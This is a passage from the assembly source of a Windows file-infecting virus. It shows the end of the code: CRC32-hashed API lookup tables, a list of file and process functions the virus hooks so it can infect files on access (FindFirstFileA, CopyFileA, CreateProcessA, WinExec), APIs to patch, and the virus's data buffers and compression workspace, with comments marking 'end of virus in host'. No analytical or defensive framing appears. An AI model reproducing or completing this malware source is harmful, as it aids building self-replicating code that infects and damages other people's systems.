094524B42h ;UnmapViewOfFile dd 019F33607h ;CreateThread dd 0D4540229h ;WaitForSingleObject dd 068624A9Dh ;CloseHandle dd 020B943E7h ;CreateMutexA dd 0C449CF4Eh ;ReleaseMutex dd 0C6F22166h ;OpenMutexA dd 00AC136BAh ;Sleep dd 079C3D4BBh ;VirtualProtect dd 0EB1CE85Ch ;GetCurrentProcessId dd 033D350C4h ;OpenProcess dd 041A050AFh ;TerminateProcess dd 04134D1ADh ;LoadLibraryA dd 0FFC97C1Fh ;GetProcAddress dd 0AFDF191Fh ;FreeLibrary ;APIs to hook crchAPIs dd 0AE17EBEFh ;FindFirstFileA dd 0AA700106h ;FindNextFileA dd 05BD05DB1h ;CopyFileA dd 0953F2B64h ;CopyFileExA dd 08C892DDFh ;CreateFileA dd 0267E0B05h ;CreateProcessA dd 0DE256FDEh ;DeleteFileA dd 0C633D3DEh ;GetFileAttributesA dd 08F48B20Dh ;GetFullPathNameA dd 0F2F886E3h ;_lopen dd 02308923Fh ;MoveFileA dd 03BE43958h ;MoveFileExA dd 068D8FC46h ;OpenFile dd 03C19E536h ;SetFileAttributesA dd 028452C4Fh ;WinExec dd 040F57181h ;ExitProcess dd 0058F9201h ;ExitThread dd 087D52C94h ;GetLastError dd 068624A9Dh ;CloseHandle ;APIs to patch crcpAPIs dd 0E141042Ah ;GetProcessHeap dd 042F13D06h ;GetVersion dd 0DE5C074Ch ;GetVersionEx dd 052CA6A8Dh ;GetStartupInfoA dd 04E52DF5Ah ;GetStartupInfoW dd 03921BF03h ;GetCommandLineA dd 025B90AD4h ;GetCommandLineW dd 003690E66h ;GetCurrentProcess dd 019F33607h ;CreateThread dd 082B618D4h ;GetModuleHandleA dd 09E2EAD03h ;GetModuleHandleW dd ? virus_end: ;end of virus in host tmp dd ? ;temporary variable org tmp ;overlay WFD WIN32_FIND_DATA ? ;Win32 Find Data WFD2 WIN32_FIND_DATA ? ;Win32 Find Data data_buffer db 256 dup (?) ;buffer for VLCB_TData size_unint = $ - virus_end ;size of unitialized ;variables ;used only by first generation of virus workspace1 db 16 dup (?) ;usd by compression workspace2 db 16 dup (?) ;engine _GetModuleHandleA dd offset GetModuleHandleA ends ;end of code section End first_gen ;end of virus